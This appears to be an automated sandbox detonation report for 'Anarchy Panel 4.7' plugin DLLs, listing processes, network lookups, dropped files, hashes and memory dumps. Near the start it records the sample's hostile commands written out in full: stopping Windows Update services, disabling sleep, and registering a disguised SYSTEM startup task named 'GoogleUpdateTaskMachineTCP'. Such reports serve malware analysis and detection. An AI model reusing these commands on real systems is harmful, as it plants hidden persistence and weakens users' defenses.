sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fratkkd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineTCP' /tr '''C:\Program Files\Google\Chrome\updatestarter.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updatestarter.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineTCP' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 428 -p 588 -ip 588
C:\Windows\system32\certreq.exe
"C:\Windows\system32\certreq.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 588 -s 764
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 468 -p 316 -ip 316
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 316 -s 3892
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 528 -p 316 -ip 316
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\sihost.exe
sihost.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.208.79.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.67.143:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | 143.67.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.141.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.194.73.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.173.189.20.in-addr.arpa | udp |
Files
memory/4632-133-0x0000000002D60000-0x0000000002D96000-memory.dmp
memory/4632-134-0x0000000074980000-0x0000000075130000-memory.dmp
memory/4632-135-0x0000000002CD0000-0x0000000002CE0000-memory.dmp
memory/4632-136-0x0000000002CD0000-0x0000000002CE0000-memory.dmp
memory/4632-137-0x0000000005940000-0x0000000005F68000-memory.dmp
memory/4632-138-0x00000000056B0000-0x00000000056D2000-memory.dmp
memory/4632-139-0x0000000005FE0000-0x0000000006046000-memory.dmp
memory/4632-140-0x0000000006050000-0x00000000060B6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3cy31vnb.nyd.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4632-150-0x0000000006680000-0x000000000669E000-memory.dmp
memory/4632-151-0x0000000002CD0000-0x0000000002CE0000-memory.dmp
memory/4632-152-0x000000007FBB0000-0x000000007FBC0000-memory.dmp
memory/4632-153-0x0000000007880000-0x00000000078B2000-memory.dmp
memory/4632-154-0x00000000707A0000-0x00000000707EC000-memory.dmp
memory/4632-164-0x0000000006C50000-0x0000000006C6E000-memory.dmp
memory/4632-165-0x0000000007FF0000-0x000000000866A000-memory.dmp
memory/4632-166-0x00000000079B0000-0x00000000079CA000-memory.dmp
memory/4632-167-0x0000000007A00000-0x0000000007A0A000-memory.dmp
memory/4632-168-0x0000000007C50000-0x0000000007CE6000-memory.dmp
memory/4632-169-0x0000000074980000-0x0000000075130000-memory.dmp
memory/4632-170-0x0000000007BD0000-0x0000000007BDE000-memory.dmp
memory/4632-171-0x0000000002CD0000-0x0000000002CE0000-memory.dmp
memory/4632-172-0x0000000007C20000-0x0000000007C3A000-memory.dmp
memory/4632-173-0x0000000007C10000-0x0000000007C18000-memory.dmp
memory/4632-174-0x0000000002CD0000-0x0000000002CE0000-memory.dmp
memory/4632-175-0x0000000007EC0000-0x0000000007EE2000-memory.dmp
memory/4632-176-0x0000000008C20000-0x00000000091C4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc0.exe
| MD5 | 17d1a593f7481f4a8cf29fb322d6f472 |
| SHA1 | a24d8e44650268f53ca57451fe564c92c0f2af35 |
| SHA256 | f837127a9ca8fb7baed06ec5a6408484cb129e4e33fa4dc6321097240924078c |
| SHA512 | 8c6617cceb98c0d42abea528419038f3d8ffc9001fc6a95ce8706d587365132b7b905d386a77767f3b6984bbce4fd2f43d9615a6dd695ee70c9fac938f130849 |
C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc0.exe
| MD5 | 17d1a593f7481f4a8cf29fb322d6f472 |
| SHA1 | a24d8e44650268f53ca57451fe564c92c0f2af35 |
| SHA256 | f837127a9ca8fb7baed06ec5a6408484cb129e4e33fa4dc6321097240924078c |
| SHA512 | 8c6617cceb98c0d42abea528419038f3d8ffc9001fc6a95ce8706d587365132b7b905d386a77767f3b6984bbce4fd2f43d9615a6dd695ee70c9fac938f130849 |
memory/4632-189-0x0000000002CD0000-0x0000000002CE0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc0.exe
| MD5 | 17d1a593f7481f4a8cf29fb322d6f472 |
| SHA1 | a24d8e44650268f53ca57451fe564c92c0f2af35 |
| SHA256 | f837127a9ca8fb7baed06ec5a6408484cb129e4e33fa4dc6321097240924078c |
| SHA512 | 8c6617cceb98c0d42abea528419038f3d8ffc9001fc6a95ce8706d587365132b7b905d386a77767f3b6984bbce4fd2f43d9615a6dd695ee70c9fac938f130849 |
C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe
| MD5 | c4b8578d2354c38613669b1c82a08ccb |
| SHA1 | f6b0353977350e42d6a4f09f887c41b51c1adf6e |
| SHA256 | 3297bc041d9579715b6724204059f5cdc0bcfcbfaa2548b8daaf7ad90e0e82d2 |
| SHA512 | 903d6520c0bd968ca7854bde2edce0c0191592d29050762b00c35c8d25c28304100955cf9ba2956f2c8905f572c7ea67c0b2494622745e82a8a5511146ea9a73 |
C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe
| MD5 | c4b8578d2354c38613669b1c82a08ccb |
| SHA1 | f6b0353977350e42d6a4f09f887c41b51c1adf6e |
| SHA256 | 3297bc041d9579715b6724204059f5cdc0bcfcbfaa2548b8daaf7ad90e0e82d2 |
| SHA512 | 903d6520c0bd968ca7854bde2edce0c0191592d29050762b00c35c8d25c28304100955cf9ba2956f2c8905f572c7ea67c0b2494622745e82a8a5511146ea9a73 |
C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe
| MD5 | c3ec8ce62adc05301e89a5db1694d79d |
| SHA1 | 033a64fd7f407d319dd660e9f9ba49851b9229a1 |
| SHA256 | 97cc46d4f3ed56b872bd8cd8a7f35a6a3128b898bb8a5b03c36c4f8d29f0f9cf |
| SHA512 | cebaa16485bfd01081b727375a458f9a817a5295a157adffbf5ec4f76697caa8bc6d8f0de5909dab98f6948d085f82ebbab479bfb3d3c2a285b3f422139baf6d |
C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe
| MD5 | c3ec8ce62adc05301e89a5db1694d79d |
| SHA1 | 033a64fd7f407d319dd660e9f9ba49851b9229a1 |
| SHA256 | 97cc46d4f3ed56b872bd8cd8a7f35a6a3128b898bb8a5b03c36c4f8d29f0f9cf |
| SHA512 | cebaa16485bfd01081b727375a458f9a817a5295a157adffbf5ec4f76697caa8bc6d8f0de5909dab98f6948d085f82ebbab479bfb3d3c2a285b3f422139baf6d |
C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe
| MD5 | c3ec8ce62adc05301e89a5db1694d79d |
| SHA1 | 033a64fd7f407d319dd660e9f9ba49851b9229a1 |
| SHA256 | 97cc46d4f3ed56b872bd8cd8a7f35a6a3128b898bb8a5b03c36c4f8d29f0f9cf |
| SHA512 | cebaa16485bfd01081b727375a458f9a817a5295a157adffbf5ec4f76697caa8bc6d8f0de5909dab98f6948d085f82ebbab479bfb3d3c2a285b3f422139baf6d |
C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc3.exe
| MD5 | 27543547fa480422e56e0b4cdbb09488 |
| SHA1 | 35f701bc2c43a308098251d9d413e64e52176fc2 |
| SHA256 | 9664dde8876d8c83375bb227bfebabb53acbbd4920a88acf100ec7ca6c0bc664 |
| SHA512 | a2efa21a27ef67df01578eb4903b8adc852fa682dc168512b4547536d67d801cad0a25af570e0d085f9d4b340a569c964a4cead05e3f8114b5f2b2d659b7a4b2 |
C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc3.exe
| MD5 | 27543547fa480422e56e0b4cdbb09488 |
| SHA1 | 35f701bc2c43a308098251d9d413e64e52176fc2 |
| SHA256 | 9664dde8876d8c83375bb227bfebabb53acbbd4920a88acf100ec7ca6c0bc664 |
| SHA512 | a2efa21a27ef67df01578eb4903b8adc852fa682dc168512b4547536d67d801cad0a25af570e0d085f9d4b340a569c964a4cead05e3f8114b5f2b2d659b7a4b2 |
C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc3.exe
| MD5 | 27543547fa480422e56e0b4cdbb09488 |
| SHA1 | 35f701bc2c43a308098251d9d413e64e52176fc2 |
| SHA256 | 9664dde8876d8c83375bb227bfebabb53acbbd4920a88acf100ec7ca6c0bc664 |
| SHA512 | a2efa21a27ef67df01578eb4903b8adc852fa682dc168512b4547536d67d801cad0a25af570e0d085f9d4b340a569c964a4cead05e3f8114b5f2b2d659b7a4b2 |
memory/4632-215-0x0000000074980000-0x0000000075130000-memory.dmp
memory/448-216-0x0000000002190000-0x0000000002197000-memory.dmp
memory/448-217-0x0000000002230000-0x0000000002630000-memory.dmp
memory/448-218-0x0000000002230000-0x0000000002630000-memory.dmp
memory/2688-219-0x00007FFC2B8B0000-0x00007FFC2C371000-memory.dmp
memory/2688-220-0x0000023FA6610000-0x0000023FA6620000-memory.dmp
memory/448-221-0x0000000002230000-0x0000000002630000-memory.dmp
memory/2688-222-0x0000023FA6610000-0x0000023FA6620000-memory.dmp
memory/448-223-0x0000000002230000-0x0000000002630000-memory.dmp
memory/2688-233-0x0000023FA87D0000-0x0000023FA87F2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | bf5ac66a6a0b2e5a158d989669ea5202 |
| SHA1 | 56eaeb9500ac19e9006c5f5cd96f6ad648e92612 |
| SHA256 | 70a48a9f41e18cb879549fc403fe7080aab5213506fd00bbd0b34ea3f68ac408 |
| SHA512 | 9732bd97c4a2984bed99b1dcb46c685eca1bcc5c88c92f7ba39998f468e00240ad3e8f65f11f5e477a2472bef0ab1080804e227c4dc177d36744b5e6a618d3e1 |
memory/2688-235-0x0000023FA6610000-0x0000023FA6620000-memory.dmp
memory/2688-238-0x00007FFC2B8B0000-0x00007FFC2C371000-memory.dmp
memory/4456-241-0x00007FFC4A430000-0x00007FFC4A625000-memory.dmp
memory/4456-242-0x00007FFC485C0000-0x00007FFC4867E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/2712-244-0x00007FFC2B8B0000-0x00007FFC2C371000-memory.dmp
memory/2712-245-0x00000227EC730000-0x00000227EC740000-memory.dmp
memory/2712-246-0x00000227EC730000-0x00000227EC740000-memory.dmp
memory/588-256-0x000001EC30030000-0x000001EC30057000-memory.dmp
memory/676-257-0x00000248341B0000-0x00000248341D7000-memory.dmp
memory/588-262-0x00007FFC4A4CF000-0x00007FFC4A4D0000-memory.dmp
memory/588-259-0x00007FFC4A4CD000-0x00007FFC4A4CE000-memory.dmp
memory/588-252-0x000001EC30000000-0x000001EC30021000-memory.dmp
memory/316-265-0x00000214404D0000-0x00000214404F7000-memory.dmp
memory/952-271-0x00007FFC0A4B0000-0x00007FFC0A4C0000-memory.dmp
memory/436-276-0x00007FFC0A4B0000-0x00007FFC0A4C0000-memory.dmp
memory/436-274-0x00000236C7110000-0x00000236C7137000-memory.dmp
memory/676-273-0x00000248341B0000-0x00000248341D7000-memory.dmp
memory/676-275-0x00007FFC4A4CD000-0x00007FFC4A4CE000-memory.dmp
memory/4860-270-0x00007FF6D2890000-0x00007FF6D2E5C000-memory.dmp
memory/676-280-0x00007FFC4A4CC000-0x00007FFC4A4CD000-memory.dmp
memory/952-281-0x00000179CE9E0000-0x00000179CEA07000-memory.dmp
memory/436-283-0x00000236C7110000-0x00000236C7137000-memory.dmp
memory/752-285-0x00000234621D0000-0x00000234621F7000-memory.dmp
memory/316-282-0x00000214404D0000-0x00000214404F7000-memory.dmp
memory/872-278-0x0000013EA7F90000-0x0000013EA7F93000-memory.dmp
memory/676-277-0x00007FFC4A4CF000-0x00007FFC4A4D0000-memory.dmp
memory/952-264-0x00000179CE9E0000-0x00000179CEA07000-memory.dmp
memory/676-260-0x00007FFC0A4B0000-0x00007FFC0A4C0000-memory.dmp
memory/448-286-0x0000000002230000-0x0000000002630000-memory.dmp
memory/752-287-0x00007FFC0A4B0000-0x00007FFC0A4C0000-memory.dmp
memory/752-288-0x00000234621D0000-0x00000234621F7000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a7ce8cefc3f798abe5abd683d0ef26dd |
| SHA1 | b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e |
| SHA256 | 5e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a |
| SHA512 | c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64 |
memory/1064-293-0x000001E3E2590000-0x000001E3E25B7000-memory.dmp
memory/1064-295-0x00007FFC0A4B0000-0x00007FFC0A4C0000-memory.dmp
memory/1092-297-0x0000022C03060000-0x0000022C03087000-memory.dmp
memory/1092-299-0x00007FFC0A4B0000-0x00007FFC0A4C0000-memory.dmp
memory/1104-303-0x00007FFC0A4B0000-0x00007FFC0A4C0000-memory.dmp
memory/1104-301-0x0000014BD96C0000-0x0000014BD96E7000-memory.dmp
memory/2712-305-0x00007FFC2B8B0000-0x00007FFC2C371000-memory.dmp
memory/2712-306-0x00000227EC730000-0x00000227EC740000-memory.dmp
memory/588-308-0x000001EC30030000-0x000001EC30057000-memory.dmp
memory/316-315-0x00000214404D0000-0x00000214404F7000-memory.dmp
memory/448-319-0x0000000002230000-0x0000000002630000-memory.dmp
memory/316-314-0x00007FFC0A4B0000-0x00007FFC0A4C0000-memory.dmp
memory/4456-311-0x00007FF77D520000-0x00007FF77D549000-memory.dmp
memory/448-310-0x00000000030C0000-0x00000000030F6000-memory.dmp
memory/1180-321-0x00000220F8940000-0x00000220F8967000-memory.dmp
memory/2712-323-0x00007FFC2B8B0000-0x00007FFC2C371000-memory.dmp
memory/1180-326-0x00000220F8940000-0x00000220F8967000-memory.dmp
memory/1180-325-0x00007FFC0A4B0000-0x00007FFC0A4C0000-memory.dmp
memory/752-328-0x00000234621D0000-0x00000234621F7000-memory.dmp
memory/1064-329-0x000001E3E2590000-0x000001E3E25B7000-memory.dmp
memory/1092-330-0x0000022C03060000-0x0000022C03087000-memory.dmp
memory/1104-331-0x0000014BD96C0000-0x0000014BD96E7000-memory.dmp
memory/1180-332-0x00000220F8940000-0x00000220F8967000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2023-07-19 00:36
Reported
2023-07-19 01:07
Platform
win7-20230712-en
Max time kernel
1559s
Max time network
1565s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\59Zp7paEHDF7luJ.dll",#1
Network
Files
Analysis: behavioral10
Detonation Overview
Submitted
2023-07-19 00:36
Reported
2023-07-19 01:07
Platform
win10v2004-20230703-en
Max time kernel
1769s
Max time network
1165s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\CjETR6GpGXqM.dll",#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.120.234.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.1.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.8.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.74.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.73.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral32
Detonation Overview
Submitted
2023-07-19 00:36
Reported
2023-07-19 01:07
Platform
win10v2004-20230703-en
Max time kernel
1162s
Max time network
1168s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\mML6WKMqdxjDGA.dll",#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 208.194.73.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.74.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral12
Detonation Overview
Submitted
2023-07-19 00:36
Reported
2023-07-19 01:07
Platform
win10v2004-20230703-en
Max time kernel
1755s
Max time network
1168s
Command Line
Signatures
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{C4C8BD77-D224-4F17-AF16-81DAE6FCD035}.catalogItem | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat | C:\Windows\System32\svchost.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
Uses Task Scheduler COM API
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\EVa7gBMKoaHmLC.dll",#1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.120.234.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.74.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.1.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.1.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.81.21.72.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.211.247.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.208.79.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.77.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.73.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\wsuA642.tmp
| MD5 | c01eaa0bdcd7c30a42bbb35a9acbf574 |
| SHA1 | 0aee3e1b873e41d040f1991819d0027b6cc68f54 |
| SHA256 | 32297224427103aa1834dba276bf5d49cd5dd6bda0291422e47ad0d0706c6d40 |
| SHA512 | d26ff775ad39425933cd3df92209faa53ec5b701e65bfbcccc64ce8dd3e79f619a9bad7cc975a98a95f2006ae89e50551877fc315a3050e48d5ab89e0802e2b7 |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat
| MD5 | bb40fbc226480c508d39693d38cec38e |
| SHA1 | 1ad89427482d5bc0c6387978e89750501dc19d5e |
| SHA256 | 9e9312260b17484244827f311b8c074dafba75ac20f25ceb1eea66f9bd655bdf |
| SHA512 | 75693ab8db77a9c0059551580c32861fcd34f2b781ab31a0c9d02c768120208da76eb7ff09678d8b61448c88ccabc8068b0a8e0dbddefa3fb2dbe60e7c8e5b92 |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat
| MD5 | ae8533130073ebaf50cd79d27f827570 |
| SHA1 | 2d5c8edbf1b3cfb885e7980539d873ccddbdc362 |
| SHA256 | f7aef9cf3cc6e5df4a314f2849eb968d2e901d1c7e483769301eebf95c560ff7 |
| SHA512 | ebfb0feee181f65db3baad2587cce08cb636ad84129ee3817e84f2dda3ec170c2f518fdaad6715a5fced93a8c594d5a7fb769794c5e35ef1ab96721beefa16f1 |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat
| MD5 | 3bb7dc9ed69a8ac25da1fb2610ddd87e |
| SHA1 | e8f415cb45b0a1caf8e68283584d144bb89bb338 |
| SHA256 | 6f08ce47a5b22664deade3e3bf9a95c1397a92594589d96988bc42000a981e1d |
| SHA512 | f815c983e70664ad25df5800d8eec5bd7dbd3242bbf6c1fbd528be1f2307b4fdb23f3555d5780de295fd695856e2d7b86fe3e15df6a3f4eea7ef4d3493d8658e |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat
| MD5 | 22c1f20184a4da88dbd761e83d4d3e75 |
| SHA1 | db09fa52db52d30153777f9c196f67225ad0522e |
| SHA256 | f6ac35241be252a7991ecab9e0748a305824d4801a142544e92665d44b38b385 |
| SHA512 | 5817ad83ffdfdea70298bfcb4b4f1b62e93b3616b1aeaca6113499840e8a39fd282517b3df75c1252e20cd81872f7bfc83ce14687d39677203770f860f7e3031 |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat
| MD5 | 2fb50b37935e8bd968a846d82b8f8e83 |
| SHA1 | 676e22e916700a50154e9dae56114330fb7664ac |
| SHA256 | 36230ac18b2e7c099b5a7ce6e66bec1aa20ba21742d66ff749151209b109c43e |
| SHA512 | 05e8ffc99dbfc76d45d0558e25b460e78c0d0c89cf0949f547c00f17befaeab8d19817cce93c3f7b138f44d285deea2e32fc2c1f57e7049f79424a52940be701 |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat
| MD5 | 5f379394d1942441c8dd49d92e383c32 |
| SHA1 | cb03e7ce6157ec68c74c28e8bdce5ddb1bfa7a0b |
| SHA256 | 0947ee5c019f54bf3acfc735889e243b44ff26a3dad183761ae27fad667a6032 |
| SHA512 | 6d234316a4dd1791ccf1ea164f48e8a904201d78747d6acd1a099cc0915dc30cf7adbe2a55c34c904ae3ff64c735eb2a6f19d165d6dcd36f7a3909cc29d6cd41 |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat
| MD5 | 30b68dafb1e75a9f96b19a169d1bb9ec |
| SHA1 | 5ed22cd49f268842c97b948dfec259c73d5a7c9e |
| SHA256 | 9e43b701575950d829b81a0a7b74355e48ee0f8ca43d10cd77e9f4bd3fd167e0 |
| SHA512 | a7569c2d3c32b0b61a1d0e6fd6c8a94fd9f79ae4b7eed28bd883f694a78a329f68016a3e5f4d420ebe93bebf4d62f86aab7d3540aa1da4f641e56febfdf85463 |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat
| MD5 | e78be81225dbe7869c8353d426e10517 |
| SHA1 | 58e39bf67bdf119411be4f97c211fcf8acb72322 |
| SHA256 | 6cd370adf48e43e773a2f3b76ceae308796f46799e4275adc787612af166a8e4 |
| SHA512 | 43e351193f9e0e6a35d9eb0080362de27ce53605b30eae28d23cbbb1b40c3b6da171532572da8000d37cdcbf4c09675638ff3da329d4ad220114bd74bcd5a61a |
memory/1608-342-0x0000020323880000-0x0000020323890000-memory.dmp
memory/1608-361-0x0000020323980000-0x0000020323990000-memory.dmp
memory/1608-377-0x000002032BCF0000-0x000002032BCF1000-memory.dmp
memory/1608-379-0x000002032BD20000-0x000002032BD21000-memory.dmp
memory/1608-380-0x000002032BD20000-0x000002032BD21000-memory.dmp
memory/1608-381-0x000002032BE30000-0x000002032BE31000-memory.dmp
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat
| MD5 | 1e953c338201641935bd59debfd058fa |
| SHA1 | f9ba7c3dd4ce5ba336c02a3181db38f7c05bbcff |
| SHA256 | 70d7514d42b7ef3850f276508f6cc77cb1958572e695d77dd27613a877dafb10 |
| SHA512 | d312255a2a530bbb8aec5d987bb86a0c68927273003ceb04c680b2bfba3183250140dd7595b9853ae96daff1cc1d034bfaa70819650eb3242d453bdadb940d09 |
